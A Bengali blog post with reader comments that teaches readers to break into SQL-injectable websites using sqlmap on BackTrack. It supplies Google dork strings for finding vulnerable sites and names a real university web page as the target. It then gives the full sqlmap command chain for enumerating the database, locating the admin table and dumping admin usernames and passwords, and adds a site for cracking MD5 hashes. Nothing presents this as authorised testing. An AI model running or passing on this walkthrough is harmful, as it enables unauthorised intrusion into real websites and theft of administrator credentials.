কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

12
1129

আসসালামওলাইকুম। আশা করি মহান আল্লাহ তা’আলার অশেষ রহমতে আপনারা সবাই ভাল আছেন। আমি আসলে অনেক দিন সময় পাই নি টিউনারপেজ এ টিউন করার। এই জন্য প্রথমে সবার কাছে ক্ষমা চেয়ে নিচ্ছি।

 

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

আজকে আপনারা জানেবন যে কিভাবে ব্যাক-ট্রাক এর একটি পেনটেস্ট টুল sqlmap দিয়ে sql vulnerable ওয়েবসাইট হ্যাক করা যায়। তাহলে চলেন শুরু করা যাক।

 

আমাদের এই টিউটোরিয়াল এর জন্য যা যা লাগবে…………

১. ব্যাক-ট্রাক।

২. একটি sql vulnerable ওয়েবসাইট।

৩. আর একটু ধৈর্য।

 

প্রথমে আপনারা আপনাদের ব্যাক-ট্রাক রান করেন। ব্যাক-ট্রাক চালু হওয়ার পর আপনার টার্মিনাল ওপেন করুন। এবং sqlmap রান করুন। sqlmap রান করার কমান্ড হচ্ছে………………

cd /pentest/database/sqlmap/

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

এবার টাইপ করুন ./sqlmap.py

./ লিনাক্স এর রান কমান্ড। এখন আপনি sqlmap চালু করতে সক্ষম। এখন পরের স্টেপ। আমাদের একটি sql vulnerable ওয়েবসাইট লাগবে। আমি কিছু Google Dork দিচ্ছি যে গুল দিয়ে আপনেরা vulnerable ওয়েবসাইট খুজতে পারবেন।

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=

আমরা একটা ওয়েবসাইট বেছে নিয়েছি। আমাদের টার্গেট ওয়েবসাইট হচ্ছেঃ http://www.hu.edu.pk/viewfaculty.php?id=12

আমরা এখন অ্যাটাক শুরু করব। আমরা মাত্র ৪ টা ছোট ছোট কমান্ড এ একটা sql vulnerable ওয়েবসাইট হ্যাক করতে পারি। যেটা sqlmap এর সব চেয়ে বর সুবিধা :) ।

আমাদের প্রথম কমান্ড হচ্ছেঃ ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 –current-db

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

আমরা যে এই কমান্ড টা দিলাম এর কাজ কি?

আপনারা আগেই জানেন যে ./sqlmap.py হচ্ছে রান কমান্ড।  -u মানে হচ্ছে যে আমরা টার্গেট ওয়েবসাইট এর লিঙ্ক দিব এই -u এর পরে। –current-db মানে হচ্ছে ওয়েবসাইট এর বর্তমান ডাটাবেস বের করার কমান্ড। কারণ আমরা সব এডমিন আইডি এবং পাসওয়ার্ড ডাটাবেস এর মধ্যে সংরক্ষিত থাকে। যেখান থেকে আমরা ওয়েবসাইট এর এডমিন আইডি অ্যান্ড পাসওয়ার্ড বের করব।

ওকে। এখন পরের স্টেপ।

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

আমরা c3results নামের একটা ডাটাবেস পেয়েছি। এখন আমাদের অ্যাটাক এর পরের স্টেপ। টাইপ করুনঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

এখানে আমরা কি কমান্ড দিলাম। আমরা শুধু –current-db এর বদলে -D লেখেছি। কারণ আমরা এখন ডাটাবেস পেয়ে গেছি। তাই আমরা -D দিয়ে ডাটাবেস এর নাম দিচ্ছি। –tables মানে হচ্ছে আমরা ওয়েবসাইট এর টেবিল গুল দেখব। আর আমাদের টার্গেট হবে এডমিন এর টেবিল। যেখানে ওয়েবসাইট এর এডমিন আইডি অ্যান্ড পাসওয়ার্ড থাকবে। এই কমান্ড দিয়ে এন্টার করার পরে আপনি অনেকগুল টেবিল দেখতে পারবেন।

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

আপনারা দেখলেন যে আমরা admin নাম এর একটা টেবিল পেয়েছি। আপনারা সব সময় যখন এ ওয়েবসাইট হ্যাক করতে বসবেন। আপনারা এই টার্গেট নিয়ে বসবেন যে আপনি ওয়েবসাইট এর এডমিন টেবিল খুঁজবেন।  এখন আমাদের পরের অ্যাটাক স্টেপ। টাইপ করুন এই কমান্ড টিঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin –columns

 

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

আমরা সব কিছুই ঠিক রাখব। শুধু –tables এর স্থানে -T দিয়ে আমারদের টার্গেট টেবিল নেম admin দিয়েছি এবং এই টেবিল এর কলাম বের করার জন্য আমরা –columns কমান্ড টি দিয়েছি। এখন আপনারা কমান্ড টি এন্টার করলেই এডমিন টেবিল এর কলাম গুল চলে আসবে। কলাম টেবিল গুল নিচের মত দেখাবেঃ

 

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

এখন আমাদের লাস্ট এবং সব চেয়ে সোজা কমান্ড :D । এখন টাইপ করুনঃ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin –dump

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

আমরা শুধু এখানে –columns এর বদলে –dump বসিয়েছি। এখন কমান্ড টি এন্টার করুন। তাহলে আপনারা নিচের মত এডমিন আইডি এবং পাসওয়ার্ড পেয়ে যাবেন।

 

কিভাবে sql vulnerable সাইট হ্যাক করবেন sqlmap দিয়ে?

 

Congratulations!!! আমরা এডমিন আইডি অ্যান্ড পাসওয়ার্ড পেয়ে গেছি। অনেক ওয়েবসাইট এর ক্ষেত্রে আপনারা পাসওয়ার্ড MD5 hash কোড পাবেন। যদি কোন সময় এই রকম সিচুএশন এ পরেন। তাহলে আপনারা এই ওয়েবসাইট এ গিয়ে MD5 hash টি ক্র্যাক করে নিতে পারেন।

http://www.md5decrypter.co.uk/

 

আজকের মত এখানেই শেষ। মহান আল্লাহ তা’আলা রহম করলে এখন থেকে প্রতিদিন আপনাদের কে ব্যাক-ট্রাক এর হ্যাকিং টিউটরিয়াল দেওয়ার চেষ্টা করব। দয়া করে কমেন্ট করে কারো কোন প্রবলেম থাকলে জানাবেন। আমি সাহায্য করার চেষ্টা করব ইনশাল্লাহ। সবাইকে সালাম জানিয়ে শেষ করছি। আসসালামওলাইকুম।

 

ফেসবুক এ আমি

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

12 মন্তব্য

  1. বে-সম্ভব চমৎকার পোস্ট। চালিয়ে যান ভাই। আপনারা পোস্টগুলো আমার কাছে অসাম লাগছে :D

    বিঃদ্রঃ ছবিগুলোকে পোস্টটের মাঝ বরাবর রাখবেন, তাহলে আরও ভাল দেখা যাবে :D

  2. হ্যাকিং বুঝি না চেষ্টা ও করিনা। তবে চমৎকার একটি পোস্ট দিয়েছেন অনেক বিস্তারিত আলোচনা করেছেন দেখে ভালো লাগছে চালিয়ে যান।

  3. ব্যাক-ট্রাক সাধারানত সিকিউরিটি প্রফেসনাল দের জন্য ডেভেলপ করা। এটা দ্বারা হ্যাকিং ও ডিফেন্স দুইটাই করা সম্ভব। আপনাকে এইটা ডাউনলোড করতে হবে। ডাউনলোড লিংকঃ

    Torrent: http://mirror.switch.ch/ftp/pool/2/mirror/backtrack/BT5R3-GNOME-32.torrent

    Direct: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R3-GNOME-32.iso

    ব্যাক-ট্রাক এর নতুন ভার্সন রিলিস হয়েছে। কিন্তু আপনারা যারা আগে ব্যাক-ট্রাক ব্যবহার করেন নাই। তারা ব্যাক-ট্রাক ব্যবহার করেন। আর যারা অনেক আগে থেকে ব্যবহার করেছেন। ভাল জ্ঞান আছে। তারা নতুন ভার্সন ডাউনলোড করতে পারেন এখান থেকেঃ

    http://mirror.nus.edu.sg/kali/kali-images/kali-linux-1.0.2-i386.iso

    এটার নামে বদলানো হয়েছে। কিন্তু ব্যাক-ট্রাক এর ডেভেলপার-রাই এইটা ডেভেলপ করেছেন।

  4. ধন্যবাদ ভাই আপনাকে এত সুন্দরভাবে একটা পোস্ট দেয়ার জন্য। অনেক ভালো লেগেছে

  5. ধন্যবাদ। আপনি sqlmap windows এ ব্যবহার করতে পারবেন। কিন্তু এর জন্য আপনাকে Python এবং sqlmap ডাউনলোড করতে হবে। Python ডাউনলোড করতে এখানে জানঃ

    http://www.python.org/download/

    এটার ২.৭ ভার্সন টা ডাউনলোড করে নিতে পারেন। Python আপনার কম্পিউটার এ ইন্সটল করুন। এবং sqlmap ডাউনলোড করবেন এখান থেকে

    http://sqlmap.org/

    এখান থেকে আপনি .zip ফাইল টা ডাউনলোড করে এক্সট্র্যাক্ট করবেন। এরপর আপনি CMD এর মাধ্যমে sqlmap এক্সিকিউট করতে পারবেন। যদি প্রবলেম হয় তাহলে এইখান থেকে হেল্প পেতে পারেনঃ

    http://www.kidcosec.net/2012/12/run-sqlmap-in-windows.html

  6. উচু মানের পোস্ট !!! তবে ভাই এটা কি আমি Windows থেকে করতে পারবো ???

মন্তব্য দিন আপনার